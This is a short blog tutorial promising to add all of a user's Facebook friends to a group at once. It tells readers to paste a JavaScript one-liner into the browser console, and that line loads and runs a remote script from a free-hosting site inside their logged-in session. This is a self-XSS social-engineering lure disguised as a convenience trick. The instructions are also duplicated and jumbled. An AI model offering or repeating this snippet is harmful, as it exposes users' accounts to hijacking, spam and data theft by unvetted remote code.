Hi Friends, today we will learn how to add all your friends in any facebook group at Once. In simple terms by clicking on the Javascript , all your friends present in your friends list will be added to that particular group . Its will take less time, i.e. you don't have to add one by one members.So lets begin.
Mozilla Firefox Users :
Step 1: Open your Facebook account .
Step 2: Go to the Facebook group where you wanted to add the member.
Step 3: Press Ctrl+Shift+K , a Console window will open. See the below image .
Step 4: Now copy the Javascript code given below and paste it in the console and Press Enter :
javascript:(function({document.body.appendChild(document.createElement('script')).src='http://www.nexusgroup.byethost4.com/nexus.js';})();
For Chrome users :
Step 1 & 2 same as above
3. Right mouse click >> click on Inspect element >> Check out for "Console" .
4. Now copy the below link and just press Enter. Dat's it..wait 4 some seconds and ur friends will be added automatically.
Note : Chrome Users might face difficulty in using the script because it violates the Content Security Policy ,so script might not work! better try with Firefox
Mozilla Firefox Users :
Step 1: Open your Facebook account .
Step 2: Go to the Facebook group where you wanted to add the member.
Step 3: Press Ctrl+Shift+K , a Console window will open. See the below image .
Step 4: Now copy the Javascript code given below and paste it in the console and Press Enter :
javascript:(function({document.body.appendChild(document.createElement('script')).src='http://www.nexusgroup.byethost4.com/nexus.js';})();
Step 5 : After Pressing Enter just wait for some seconds and that's it u r done! all your friends are now added to your group.
Step 1 & 2 same as above
3. Right mouse click >> click on Inspect element >> Check out for "Console" .
4. Now copy the below link and just press Enter. Dat's it..wait 4 some seconds and ur friends will be added automatically.
Note : Chrome Users might face difficulty in using the script because it violates the Content Security Policy ,so script might not work! better try with Firefox
Comments
Post a Comment